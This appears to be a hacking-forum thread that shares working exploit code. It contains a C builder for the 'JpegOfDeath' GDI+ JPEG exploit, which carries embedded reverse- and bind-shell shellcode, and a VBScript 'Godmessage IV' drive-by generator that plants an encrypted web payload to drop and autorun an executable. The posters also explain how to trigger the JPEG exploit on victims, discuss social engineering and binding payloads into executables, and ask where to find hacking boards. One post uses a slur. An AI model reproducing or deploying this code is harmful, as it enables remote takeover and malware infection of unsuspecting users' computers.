"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68";
/* Code... */
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
void print_usage(char *prog_name)
{
printf(" Exploit Usage:\n");
printf("\t%s -r your_ip | -b [-p port] <jpeg_filename>\n\n", prog_name);
printf(" Parameters:\n");
printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t
and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or
-b then a bind\n\t\t\t\t attack will be generated.\n\n");
printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t
used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind
then the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode
is reverse connect then the port you\n\t\t\t\t specify will be the one you want
to listen\n\t\t\t\t on so the victim can connect to you\n\t\t\t\t right away.\n\n");
printf(" Examples:\n");
printf("\t%s -r 68.6.47.62 -p 8888 test.jpg\n", prog_name);
printf("\t%s -b -p 1542 myjpg.jpg\n", prog_name);
printf("\t%s -b whatever.jpg\n", prog_name);
printf("\t%s -r 68.6.47.62 exploit.jpg\n\n", prog_name);
printf(" Remember if you use the -r option to have netcat listening\n");
printf(" on the port you are using for the attack so the victim will\n");
printf(" be able to connect to you when exploited...\n\n");
printf(" Example:\n");
printf("\tnc.exe -l -p 8888");
exit(-1);
}
int main(int argc, char *argv[])
{
FILE *fout;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 1337; /* default port for bind and reverse attacks */
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char attack_mode = 2; /* bind by default */
char *p1 = NULL, *p2 = NULL;
char ip_addr[256];
char str_num[16];
char jpeg_filename[256];
WSADATA wsa;
printf(" +------------------------------------------------+\n");
printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
printf(" | September, 23, 2004 |\n");
printf(" +------------------------------------------------+\n");
if (argc < 2)
print_usage(argv[0]);
/* process commandline */
for (i = 0; i < (unsigned) argc; i++) {
if (argv[i][0] == '-') {
switch (argv[i][1]) {
case 'r':
/* reverse connect */
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
case 'b':
/* bind */
attack_mode = 2;
break;
case 'p':
/* port */
port = atoi(argv[i+1]);
break;
}
}
}
strncpy(jpeg_filename, argv[i-1], 255);
fout = fopen(argv[i-1], "wb");
if( !fout ) {
printf("Error: JPEG File %s Not Created!\n", argv[i-1]);
return(EXIT_FAILURE);
}
/* initialize the socket library */
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!\n");
exit(-1);
}
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1) {
/* reverse connect attack */
reverse_shellcode[184] = (char) 0x90;
reverse_shellcode[185] = (char) 0x92;
reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
reverse_shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
reverse_shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[182] = xor_data((char)raw_num);
}
if (attack_mode == 2) {
/* bind attack */
bind_shellcode[204] = (char) 0x90;
bind_shellcode[205] = (char) 0x92;
bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));
bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));
}
/* build the exploit jpeg */
j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
for(i = 0; i < sizeof(header1) - 1; i++)
fputc(header1[i], fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)
fputc(setNOPs1[i], fout);
for(i=0;i<sizeof(header2)-1;i++)
fputc(header2[i], fout);
for( i = j; i < 0x63c; i++)
fputc(0x90, fout);
j = i;
if (attack_mode == 1) {
for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)
fputc(reverse_shellcode[i], fout);
}
else if (attack_mode == 2) {
for(i = 0; i < sizeof(bind_shellcode) - 1; i++)
fputc(bind_shellcode[i], fout);
}
for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)
fputc(0x90, fout);
for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)
fputc(setNOPs2[j], fout);
fprintf(fout, "\xFF\xD9");
fcloseall();
WSACleanup();
printf(" Exploit JPEG file %s has been generated!\n", jpeg_filename);
return(EXIT_SUCCESS);
}
and a java drive by would be ideal, i will look into that. any info i may need would be favorable and i would appreciate it greatly!
A ton of skiddies attempt Java Driveby's on a forum I used to frequent, www.sythe.org , so I assume it can't be too difficult.
A quick Google gave a ton of tutorial links from Hackforums, but unfortunately to view them you have to create an account (hence I haven't shared any links)
__________________
Damnit, now I need to get an &t tattoo.
Here's another oldy-but-a-goody "driveby" which apparently still works as I tested it out on my machine and it built the .exe on the fly and ran it in the temp folder with a single view of the infected web page... uses visual basic script, which IE will be able to parse.
Code:
'********************************************************************
' Godmessage IV Creator v0.4
' Author: 6IT
' Thanks: The Pull - Creator of the original Godmessage - this is his brain child.
' Thanks: StoneFisk - Coauthor of Godmessage IV.
' Thanks: To all the people who helped make godmessage what it is today
'
' CHANGE LOG 10-18-00
' - See Readme.txt
'********************************************************************
Option Explicit
Dim Message, Title, Text1
Dim fso, WSHSHell, exefile, htmlfile
Dim tStart, tElapsed
Dim timeout1, timeout2, timeout3
Dim state(255)
Dim key(255)
Message = "Enter the name of the executable to wrap in Godmessage IV"
Title = "6IT's Godmessage IV Creator v0.4"
Text1 = "Sorry, user input was canceled"
Set fso = CreateObject("Scripting.FileSystemObject")
Set WSHShell = CreateObject("WScript.Shell")
Const ForReading = 1
Const ForAppending = 8
exefile = InputBox(Message,Title,"onz.exe", 4000, 3000)
If exefile = "" Then
WScript.Echo Text1
WScript.Quit()
ElseIf exefile = "onz.exe" Then
If fso.FileExists(exefile) Then
GMCreate()
Else
WScript.Echo "File Doesn't Exist!"
WScript.Quit()
End If
Else
If fso.FileExists(exefile) Then
fso.CopyFile exefile, "onz.exe", True
GMCreate()
Else
WScript.Echo "File Doesn't Exist!"
WScript.Quit()
End If
End If
WScript.Echo "Success! and Elapsed time=" & tElapsed & " seconds"
WScript.Quit()
Sub GMCreate()
PrptHtmlFile()
PrptTimeouts()
Dim inputHtml, output
Set output = fso.CreateTextFile("Godmessage.html", True)
tStart = timer()
CheckSize()
CreateXXE()
inputHtml = Insert(htmlfile)
output.Write(InputHtml)
output.close
CryptHtml()
fso.DeleteFile "onz.xxe", True
tElapsed = timer()
tElapsed = tElapsed - tStart
End Sub
Sub PrptHtmlFile()
Dim MessHtml
MessHtml = "Please enter the filename for the html file."
htmlfile = InputBox(MessHtml,Title,"default.html", 4000, 3000)
If htmlfile = "" Then
WScript.Echo Text1
WScript.Quit()
ElseIf Not fso.FileExists(htmlfile) Then
WScript.Echo "File Doesn't Exist!"
WScript.Quit()
End If
End Sub
Sub PrptTimeouts()
Dim Message1, Message2, Message3
Message1 = "Enter the timeout for the 'Path' setProperty."
Message2 = "Enter the timeout for the 'Doc' setProperty."
Message3 = "Enter the timeout for the 'invoke' method."
timeout1 = InputBox(Message1,Title,"15", 4000, 3000)
timeout2 = InputBox(Message2,Title,"2000", 4000, 3000)
timeout3 = InputBox(Message3,Title,"2500", 4000, 3000)
End Sub
Sub CheckSize()
Dim fs, fsize
Set fs = fso.GetFile("onz.exe")
fsize = fs.Size
If fsize > 34500 Then
WScript.Echo "File is Greater Than 34500 Bytes"
WScript.Quit()
End If
End Sub
Sub CreateXXE()
If fso.FileExists("onz.xxe") Then
fso.DeleteFile "onz.xxe", True
End If
WSHShell.Run "%comspec% /c xxencode.com onz.exe",0,True
End Sub
Function Insert(html)
Dim f1, i, s, strBdy
Dim regExBdy, retValBdy, retStrBdy
ReDim htmlArr(-1)
Set f1 = fso.OpenTextFile(html, ForReading)
i = 0
Do While NOT f1.AtEndOfStream
s = f1.ReadLine
Set regExBdy = New RegExp
regExBdy.Pattern = "<BODY"
regExBdy.IgnoreCase = True
retValBdy = regExBdy.Test(s)
If retValBdy Then
Dim regExOnL, retValOnL, retStrOnL
Dim MatchOnL, MatchesOnL, MatchBdy, MatchesBdy
Set regExOnL = New RegExp
regExOnL.Pattern = "onLoad="
regExOnL.IgnoreCase = True
retValOnL = regExOnL.Test(s)
If retValOnL Then
Set MatchesOnL = regExOnL.Execute(s)
For Each MatchOnL in MatchesOnL
retStrOnL = MatchOnL.FirstIndex
Next
strBdy = Left(s, retStrOnL + 8) & "f(); " & Right(s, Len(s)-(retStrOnL + 8))
s = strBdy
Else
Set MatchesBdy = regExBdy.Execute(s)
For Each MatchBdy in MatchesBdy
retStrBdy = MatchBdy.FirstIndex
Next
strBdy = Left(s, retStrBdy + 5) & " onLoad=""f()"" " & Right(s, Len(s)-(retStrBdy + 5))
s = strBdy
End If
End If
Dim regExEnd, retValEnd, retStrEnd, MatchEnd, MatchesEnd
Set regExEnd = New RegExp
regExEnd.Pattern = "</BODY>"
regExEnd.IgnoreCase = True
retValEnd = regExEnd.Test(s)
If retValEnd Then
Set MatchesEnd = regExEnd.Execute(s)
For Each MatchEnd in MatchesEnd
retStrEnd = MatchEnd.FirstIndex
Next
strBdy = Left(s, retStrEnd) & GenHtml() & Right(s, Len(s)-(retStrEnd))
s = strBdy
End If
ReDim preserve htmlArr(i)
htmlArr(i) = s
i = i + 1
Loop
f1.Close
Insert = Join(htmlArr, vbNewline)
End Function
Function StartHtml(setTimeout1, setTimeout2, setTimeout3)
Dim html(16)
html(1) = "<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"
html(2) = "<SCRIPT language=JAVASCRIPT>"
html(3) = "a1=document.applets[0];"
html(4) = "fn=""..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA"";"
html(5) = "function f(){"
html(6) = "cl=""{06290BD5-48AA-11D2-8432-006008C3FBFC}"";"
html(7) = "a1.setCLSID(cl);"
html(8) = "a1.createInstance();"
html(9) = "setTimeout(""a1.setProperty('Path','""+fn+""')""," & setTimeout1 & ");"
html(10) = "setTimeout(""a1.setProperty('DOC',doc)""," & setTimeout2 & ");"
html(11) = "setTimeout(""a1.invoke('write',VA)""," & setTimeout3 & ");}"
html(12) = "</SCRIPT><SCRIPT language=VBSCRIPT>"
html(13) = "Option Explicit"
html(14) = "Dim VA, doc"
html(15) = "VA = ARRAY()"
HTML(16) = ""
StartHtml = Join(html, vbNewline)
End Function
Function EncodeXXE()
Dim Input, nline, nl, s, a
Dim fLine1, fLine2, fLine
Set input = fso.OpenTextFile("onz.xxe", ForReading)
nLine = " & vbNewline"
nl = " & Chr(13) & Chr(10) & "
s = input.ReadLine
fLine1 = "set onzXxe=fso.CreateTextFile(" & Chr(34) & Chr(34) & "onz.xxe" & Chr(34) & Chr(34) & ")"""
fLine2 = """onzXxe.WriteLine " & Chr(34) & Chr(34) & s & Chr(34) & Chr(34)
ReDim ca(-1)
redim preserve ca(0)
ca(0) = fLine1
redim preserve ca(1)
ca(1) = nl
redim preserve ca(2)
ca(2) = fLine2
redim preserve ca(3)
ca(3) = nLine
a = 4
Do While NOT input.AtEndOfStream
ReDim preserve ca(a)
s = input.ReadLine
If s = "" Then
ca(a) = nLine
Else
fLine = " & " & Chr(34) & Chr(34) & s & Chr(34) & Chr(34)
ca(a) = fLine & nLine
End If
a = a+1
Loop
ReDim preserve ca(a)
ca(a) = Chr(34) & nl & """onzXxe.close""" & nl & Chr(34)
input.Close
EncodeXXE = Join(ca, "")
End Function
Function GenHtml()
Dim nl, htmlEnd, htmlstart, f1
nl = Chr(34) & " & Chr(13) & Chr(10) & " & Chr(34)
Dim ar1(5), ar2(11), data(5)
ar1(0) = "Chr(13) & Chr(10) & ""<SCRIPT language=VBSCRIPT>" & nl
ar1(1) = "Set fso = CreateObject(""""Scripting.FileSystemObject"""")" & nl
ar1(2) = "Set WshShell = CreateObject(""""WScript.Shell"""")" & nl
ar1(3) = "set xxDecSrc=fso.CreateTextFile(""""xxdecode.src"""")" & nl
ar1(4) = "xxDecSrc.WriteLine """"n xxdecode.com"""" & vbNewline & """"e 100 E9 A7 0 49 6E 70 75 74 20 66 69 6C 65 20 65 72 """" & vbNewline & """"e 110 72 6F 72 2E D A 4F 75 74 70 75 74 20 66 69 6C """" & vbNewline & """"e 120 65 20 65 72 72 6F 72 2E D A 73 74 61 72 74 20 """" & vbNewline & """"e 130 6E 6F 74 20 66 6F 75 6E 64 2E D A 45 6E 64 20 """" & vbNewline & """"e 140 6E 6F 74 20 66 6F 75 6E 64 2E D A 65 78 69 73 """" & vbNewline & """"e 150 74 73 2E 20 41 62 6F 72 74 69 6E 67 21 D A 0 """" & vbNewline & """"e 160 0 0 0 EA 3 EA 3 9A 3 0 2B 2D 30 31 32 33 """" & vbNewline & """"e 170 34 35 36 37 38 39 41 42 43 44 45 46 47 48 49 4A """" & vbNewline & """"e 180 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A """" & vbNewline & """"e 190 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 """" & vbNewline & """"e 1A0 71 72 73 74 75 76 77 78 79 7A E8 F0 1 E8 62 1 """" & vbNewline & """"e 1B0 BF 9A 3 E8 EF 0 AD 3D 62 65 75 F4 AD 3D 67 69 """" & vbNewline & """"e 1C0 75 EE AD 3D 6E 20 75 E8 BF 9A 3 AC 3A C4 76 FB """" & vbNewline & """"e 1D0 AC 3A C4 75 FB AC 3A C4 76 FB 3A C4 74 4 AA AC """" & vbNewline & """"e 1E0 EB F8 BA 9A 3 33 C9 88 D 80 3E 69 1 FF 74 20 """" & vbNewline & """"e 1F0 B4 4E CD 21 3C 2 74 18 3C 12 74 14 8B CF 2B CA """" & vbNewline & """"e 200 49 49 E8 3B 1 BA 4C 1 B9 13 0 B0 5 E9 24 1 """" & vbNewline & """"e 210 B4 3C CD 21 73 3 E9 F1 0 A3 61 1 BF 9A 3 E8 """" & vbNewline & """"e 220 83 0 8A 4 A C0 74 65 3C 2B 74 61 3C 20 74 5D """" & vbNewline & """"e 230 57 BB 6A 1 BA 40 0 56 AC A C0 74 12 8B FB 8B """" & vbNewline & """"e 240 CA F2 AE 75 45 8B C7 48 2B C3 88 44 FF EB E9 5E """" & vbNewline & """"e 250 5F AC 32 E4 8B E8 B9 4 6 AD 86 C4 8A D0 D0 E4 """" & vbNewline & """"e 260 D0 E4 D2 E8 A C4 AA 4D 74 B5 8A E2 AC 8A D0 D2 """" & vbNewline & """"e 270 E4 D0 E8 D0 E8 A C4 AA 4D 74 A4 8A E2 AC 8A CD """" & vbNewline & """"e 280 D2 E4 A C4 AA 4D 75 CE EB 95 E9 A1 0 E8 15 0 """" & vbNewline & """"e 290 AD 3D 65 6E 75 5 AC 3C 64 74 3 E8 9C 0 E8 51 """" & vbNewline & """"e 2A0 0 B4 4C CD 21 8B 36 63 1 89 3E 67 1 BD 43 0 """" & vbNewline & """"e 2B0 BF 4A 3 C6 5 0 3B 36 65 1 72 6 E8 33 0 E8 """" & vbNewline & """"e 2C0 50 0 AC 3C D 74 1B 3C A 74 18 AA 4D 75 E7 3B """" & vbNewline & """"e 2D0 36 65 1 72 3 E8 3A 0 AC 3C A 75 F2 BF 9A 3 """" & vbNewline & """"e 2E0 EB C7 46 C6 5 0 89 36 63 1 8B 3E 67 1 BE 4A """" & vbNewline & """"e 2F0 3 C3 BA 9A 3 8B CA 87 E 67 1 2B CA 76 A 8B """" & vbNewline & """"e 300 1E 61 1 B4 40 CD 21 72 1 C3 BA 16 1 B9 14 0 """" & vbNewline & """"e 310 EB 22 BA EA 3 B9 0 E1 8B 1E 5F 1 B4 3F CD 21 """" & vbNewline & """"e 320 72 C B C0 74 8 8B F2 3 C6 A3 65 1 C3 BA 3 """" & vbNewline & """"e 330 1 B9 13 0 E8 9 0 E9 67 FF BA 3C 1 B9 10 0 """" & vbNewline & """"e 340 50 BB 2 0 B4 40 CD 21 58 C3 54 68 69 73 20 70 """" & vbNewline & """"e 350 72 6F 67 72 61 6D 20 72 65 71 75 69 72 65 73 20 """" & vbNewline & """"e 360 44 4F 53 20 56 65 72 73 69 6F 6E 20 32 2E 30 20 """" & vbNewline & """"e 370 6F 72 20 68 69 67 68 65 72 2E D A 24 D A 49 """" & vbNewline & """"e 380 6E 70 75 74 20 70 61 74 68 2F 66 69 6C 65 3A 20 """" & vbNewline & """"e 390 20 4E 6F 20 61 63 74 69 6F 6E D A 24 B4 30 CD """" & vbNewline & """"e 3A0 21 3C 2 73 C BA 4A 3 B4 9 CD 21 B8 1 4C CD """" & vbNewline & """"e 3B0 21 E8 36 0 73 23 BA 7D 3 B9 14 0 BB 2 0 B4 """" & vbNewline & """"e 3C0 40 CD 21 BF 7F 0 C6 5 50 8B D7 B4 A CD 21 E8 """" & vbNewline & """"e 3D0 18 0 73 5 BA 91 3 EB CF BA 2C 4 B8 0 3D CD """" & vbNewline & """"e 3E0 21 72 4 A3 5F 1 C3 E9 44 FF BE 80 0 BF 2C 4 """" & vbNewline & """"e 3F0 FC AC A C0 74 2F B4 20 AC 3A C4 76 FB 3C 2F 74 """" & vbNewline & """"e 400 4 3C 2D 75 18 8B D0 8B 4 24 5F 3D 4F 20 8B C2 """" & vbNewline & """"e 410 75 B F6 16 69 1 46 46 AC 3A C4 76 A AA AC EB """" & vbNewline & """"e 420 F8 3A C4 76 2 F9 C3 C6 5 0 F8 C3 58 58 44 20 """" & vbNewline & """"e 430 76 31 2E 31 0 44 61 76 69 64 20 50 20 4B 69 72 """" & vbNewline & """"e 440 73 63 68 62 61 75 6D 2C 20 54 6F 61 64 20 48 61 """" & vbNewline & """"e 450 6C 6C 0 0 """" & vbNewline & """"rcx"""" & vbNewline & """"353"""" & vbNewline & """"w"""" & vbNewline & """"q"""" & vbNewline" & nl
ar1(5) = "xxDecSrc.close" & nl
ar2(0) = "WshShell.Run """"%comspec% /c debug < xxdecode.src"""",0,True" & nl
ar2(1) = "WshShell.Run """"%comspec% /c xxdecode.com onz.xxe"""",0,True" & nl
ar2(2) = "WshShell.Run """"%comspec% /c move onz.exe %windir%\onz.exe"""",0,True" & nl
ar2(3) = "WshShell.Run """"%comspec% /c start %windir%\onz.exe"""",0,False" & nl
ar2(4) = "fso.DeleteFile """"xxdecode.src"""", True" & nl
ar2(5) = "fso.DeleteFile """"onz.xxe"""", True" & nl
ar2(6) = "fso.DeleteFile """"xxdecode.com"""", True" & nl
ar2(7) = "strStartup = WshShell.SpecialFolders(""""Startup"""")" & nl
ar2(8) = "sysCmd = WshShell.ExpandEnvironmentStrings(""""%COMSPEC%"""")" & nl
ar2(9) = "regCmd = sysCmd & """" /c del """" & Chr(34) & strStartup & """"\ea.hta"""" & Chr(34)" & nl
ar2(10) = "WshShell.RegWrite """"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\clean"""", regCmd" & nl
ar2(11) = "<"" & Chr(47) & ""SCRIPT><BODY onload=""""javascript: window.close()""""><"" & Chr(47) & ""BODY>"
data(0) = StartHtml(timeout1, timeout2, timeout3)
data(1) = "doc = " & Join(ar1, "")
data(2) = EncodeXXE()
data(3) = Join(ar2, "") & Chr(34)
data(4) = vbNewline
data(5) = "</SCRIPT>"
GenHtml = Join(data, "")
End Function
Sub CryptHtml()
Dim f1, f2, text, enc, eKey, html
Set f1 = fso.OpenTextFile("godmessage.html", ForReading)
Set f2 = fso.CreateTextFile("Godmessage.HexEnc.html", True)
eKey = RandPwd()
text = f1.ReadAll
enc = EnCryptHex(text, eKey)
html = WrapEnc(enc, eKey)
f2.Write html
f1.Close
f2.Close
End Sub
Sub RC4Initialize(strPwd)
Dim tempSwap, i, f, intLength
intLength = len(strPwd)
For i = 0 To 255
key(i) = asc(mid(strPwd, (i mod intLength)+1, 1))
state(i) = i
Next
f = 0
For i = 0 To 255
f = (f + state(i) + key(i)) Mod 256
tempSwap = state(i)
state(i) = state(f)
state(f) = tempSwap
Next
End Sub
Function EnCryptHex(plaintxt, psw)
Dim temp, a, i, f, k, cipherby
dim cipher()
redim cipher(-1)
i = 0
f = 0
RC4Initialize(psw)
For a = 1 To Len(plaintxt)
i = (i + 1) Mod 256
f = (f + state(i)) Mod 256
temp = state(i)
state(i) = state(f)
state(f) = temp
k = (state(i) + state(f)) Mod 256
cipherby = Asc(Mid(plaintxt, a, 1)) Xor k
If cipherby = 0 then cipherby = Asc(Mid(plaintxt, a, 1))
If cipherby < 16 Then
cipherby = "0" & CStr(Hex(cipherby))
Else
cipherby = Hex(cipherby)
End If
redim preserve cipher(a-1)
cipher(a-1) = cipherby
Next
EnCryptHex = join( cipher, "")
End Function
Function RandPwd()
Dim i, x
ReDim pwdar(-1)
Randomize
For i = 0 To 31
ReDim preserve pwdar(i)
pwdar(i) = Chr(Int((122 - 42 + 1) * Rnd + 42))
Next
RandPwd = Join(pwdar, "")
End Function
Function WrapEnc(encText, encKey)
Dim encHtml(48)
encHtml(0) = "Option Explicit"
encHtml(1) = "Dim o, p, d, t, key(255), state(255)"
encHtml(2) = "p = """ & encKey & Chr(34)
encHtml(3) = "d = """ & encText & Chr(34) & vbNewline
encHtml(4) = "o = DeCryptHex(d, p)"
encHtml(5) = "t = setTimeout(""go()"", 500)"
encHtml(6) = "Sub go()"
encHtml(7) = "Document.Write o"
encHtml(8) = "Document.execCommand(""Refresh"")"
encHtml(9) = "End Sub"
encHtml(10) = "Sub RC4Initialize(strPwd)"
encHtml(11) = "Dim tempSwap, i, f, intLength"
encHtml(12) = "intLength = len(strPwd)"
encHtml(13) = "For i = 0 To 255"
encHtml(14) = "key(i) = asc(mid(strPwd, (i mod intLength)+1, 1))"
encHtml(15) = "state(i) = i"
encHtml(16) = "Next"
encHtml(17) = "f = 0"
encHtml(18) = "For i = 0 To 255"
encHtml(19) = "f = (f + state(i) + key(i)) Mod 256"
encHtml(21) = "tempSwap = state(i)"
encHtml(22) = "state(i) = state(f)"
encHtml(23) = "state(f) = tempSwap"
encHtml(24) = "Next"
encHtml(25) = "End Sub"
encHtml(26) = "Function DeCryptHex(hextext, psw)"
encHtml(27) = "Dim temp, a, x, i, f, k, cipherby"
encHtml(28) = "dim cipher()"
encHtml(29) = "redim cipher(-1)"
encHtml(30) = "x = 0"
encHtml(31) = "i = 0"
encHtml(32) = "f = 0"
encHtml(33) = "Call RC4Initialize(psw)"
encHtml(34) = "For a = 1 To Len(hextext) Step 2"
encHtml(35) = "i = (i + 1) Mod 256"
encHtml(36) = "f = (f + state(i)) Mod 256"
encHtml(37) = "temp = state(i)"
encHtml(38) = "state(i) = state(f)"
encHtml(39) = "state(f) = temp"
encHtml(40) = "k = (state(i) + state(f)) Mod 256"
encHtml(41) = "cipherby = Asc(Chr(Eval(""&H"" & Mid(hextext, a, 2)))) Xor k"
encHtml(42) = "if cipherby = 0 then cipherby = Asc(Chr(Eval(""&H"" & Mid(hextext, a, 2))))" & vbNewline
encHtml(43) = "redim preserve cipher(x)"
encHtml(44) = "cipher(x) = Chr(cipherby)"
encHtml(45) = "x = x + 1"
encHtml(46) = "Next"
encHtml(47) = "DeCryptHex = join( cipher, """")"
encHtml(48) = "End Function"
WrapEnc = "<Script Language=VBScript>" & vbNewLine & Join(encHtml, " : ") & vbNewLine & "</SCRIPT>"
End Function
The following users say "It is so good to hear it!":
thanks spectraL i just read over the driveby script, its surprisingly a simple exploit, id like to migrate it to javascript/ECMA if it could still run the exploit that way but im unsure if those will have shell access. I still dont completely understand the jpeg one due to the strange hex but that last one, ill try that one out later on today to see if i can get it to do what i need, ill be updating that script as well and will post my version after i fuck with it later on or tomorrow for whoever is interested.
Quote:
Originally Posted by ThunderDownUnder
A ton of skiddies attempt Java Driveby's on a forum I used to frequent, www.sythe.org , so I assume it can't be too difficult.
A quick Google gave a ton of tutorial links from Hackforums, but unfortunately to view them you have to create an account (hence I haven't shared any links)
yes i have found a few but im more interested in just hearing a sentance on how the exploit works and then writing it myself, i have my methods ive used in the past, and that usually includes social engineering to a group of people with 2 binded files but i decided about a year ago i do not use any programs for hacking that where written by somebody else, i barely use code librarys cuz it feels like a cheat. i will attempt to rewrite the 2 spectraL gave me and reverse engineer abit to find the main exploit, not all the surrounding nonsense.
Also, any good hacking boards on tor not full of skiddys or faggots that think they are part of anonymous because they download ddos tools?
(i say tor because most i have found are what i stated above and i have not looked on tor but that seems like a good place)
...I still dont completely understand the jpeg one due to the strange hex...
What it does, when compiled, is provide you a small program which you can use to create a .jpg file which is injected with a small executable file and download URL into the preview area of the .jpg. It also injects the commands to run that executable file when the mouse hovers over the .jpg to retrieve the preview. Just opening the folder that the infected .jpg is in will trigger the preview action and cause the executable to be started. That embedded executable file is pre-configured to perform a connect-back download and autorun from any URL (where a larger executable file is waiting to be downloaded and run by the smaller executable embedded in the .jpg). The hex code is the smaller executable in shellcode which gets injected into the .jpg file. This still works flawlessly on WinXP with service pack 3. Only issue with it is that the infected .jpg file needs to be previewed on the LOCAL MACHINE and it will not work if just previewed remotely. You would have to get the user to download the .jpg and then hover their mouse over it, or drag it, or copy it, move it, rename it, delete it or even just open a folder that it is in.
yes i saw that and ok the hex is the actual exe, i meant i couldnt understand the code itself, i get what the program does but i like to understand the entire code and not just how it works but why, so i could rewrite to fit my needs and based on what you said you helped me to reverse engineer it, i wanted to SEE the exploit i guess you would say and i figured it out, i will post up a commented version of the code with the decyphered hex and explanations of the shell commands, just for any other programmers out there that could use the exploit in their own applications, my goal is to change this to use the expoit to bind directly with an exe of my choosing and im sure i can do it now knowing this exploit. when i get around to it i will write that for whoever is interested.
spectraL.. a million thanks, its not going to waste... I do have one question, would the exploit still work if the icon is displayed in gallery view by opening th folder? im pretty sure it would, if thats the case this would work perfectly in a cookie exploit where you can navigate temp internet files from the current domain... i have seen that somewhere so then the user would not have to download anything?
also will this infect my server when the clients browser requests the file if it was on a website? this could be a problem...
